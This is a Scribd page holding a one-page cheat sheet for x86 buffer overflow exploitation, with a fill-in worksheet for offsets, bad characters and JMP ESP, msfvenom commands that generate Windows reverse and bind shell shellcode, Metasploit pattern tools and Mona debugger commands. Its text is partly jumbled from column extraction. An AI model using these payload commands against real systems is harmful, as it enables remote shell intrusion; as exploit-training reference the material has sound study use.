0% found this document useful (0 votes)
590 views1 page

Fun With Buffer Overflow Cheat Sheet

This document provides notes on buffer overflow exploitation, including discussing registering values after exploitation, finding offsets, bad characters, shellcode creation, and debugger tools and commands. The notes cover topics like creating reverse and bind shell payloads, examining register values with a debugger, using pattern_create.rb and pattern_offset.rb to find offsets, and Mona and immunity debugger commands.

Uploaded by

Mefistogr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
590 views1 page

Fun With Buffer Overflow Cheat Sheet

This document provides notes on buffer overflow exploitation, including discussing registering values after exploitation, finding offsets, bad characters, shellcode creation, and debugger tools and commands. The notes cover topics like creating reverse and bind shell payloads, examining register values with a debugger, using pattern_create.rb and pattern_offset.rb to find offsets, and Mona and immunity debugger commands.

Uploaded by

Mefistogr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Notes:

Appendix A - Fun with X86 buffer overflow ver1.2


Date: Program name: version: CVE: vuln: Exploit-web-link:
Do I have a proof of concept?What is the debuger OS/ver TCP/udp Shell type L/R port
POC?What OS? What Ver? What
debugger? Rhost =
Injected variable (ex.\x41\):
Notes:
number bytes address value register
Fuzz program with what strict pattern?:
HEX Value of EIP after strict pattern:
HEX Value of ESP after strict pattern:
Delimiter (ex. “\r\n”) :
Fuzz program with pattern.rb? Get EIP:
What was the offset.rb? Get ESP:
Which registers can help us?
Get the offset number:
Badchars: in the stack
Look for little endian in the stack:
JMP ESP:
Buffer size/ buffer length:
Shell code size and payload type:
Number of nops needed “\x90”:
Big-endian to little-endian conversion: Big-endian little-endian

Create shell codes note: ‘//’ means next line continued # A standard reverse shell payload size is 300 to 400 bytes
msfvenom -p windows/shell_reverse_tcp LHOST=<ipaddress> LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d"//
-e x86/shikata_ga_nai > windows_reverse_shell_code
msfvenom –p windows/shell_bind_tcp –f c
if you are curious about what the raw shellcode looks like then pipe it to ndisasm
msfvenom –p windows/shell_bind_tcp –f raw | ndisasm –U-
X86 assembly registers
pattern.rb current location 2017:
EIP stores the pointer to the next instruction to be executed.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb EAX (accumulator register) used in arithmetic operations.
Options: ECX (counter register) used in shift/rotate instructions and loops.
-l, --length <length> The length of the pattern EDX (Data register) used in arithmetic operations and data (I/O)
-s, --sets <ABC,def,123> Custom Pattern Sets ops
-h, --help Show this message EBX (Base register) used as pointer to data
Pattern.rb current location on kali 2017: ESP (stack pointer register) points to the current stack location.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb Points to the address at the top of the stack
EBP (base bointer register) used to pint to the base of the stack
Options:
ESI (source index register) used as a pointer to a source in stream
-q, --query Aa0A Query to Locate operations
ndasm location: /usr/share/metasploit-framework/tools/nasm_shell.rb EDI (destination index register) used as a pointer to destination in
nasm> jmp esp stream operations.
Immunity cheats F2 sets a breakpoint
If you need to know anything in the tool bar highlight the mouse over the name and it will display in the bottom grey bar.
Mona commands: ‘!mona modules’, ‘!mona find –s “\xff\xe4” –m slmfc.dll and choose address with no bad chars.’
pycommands: “auto_start, auto_table, auto_attach, custom_search JMP ESP”
Notes:

You might also like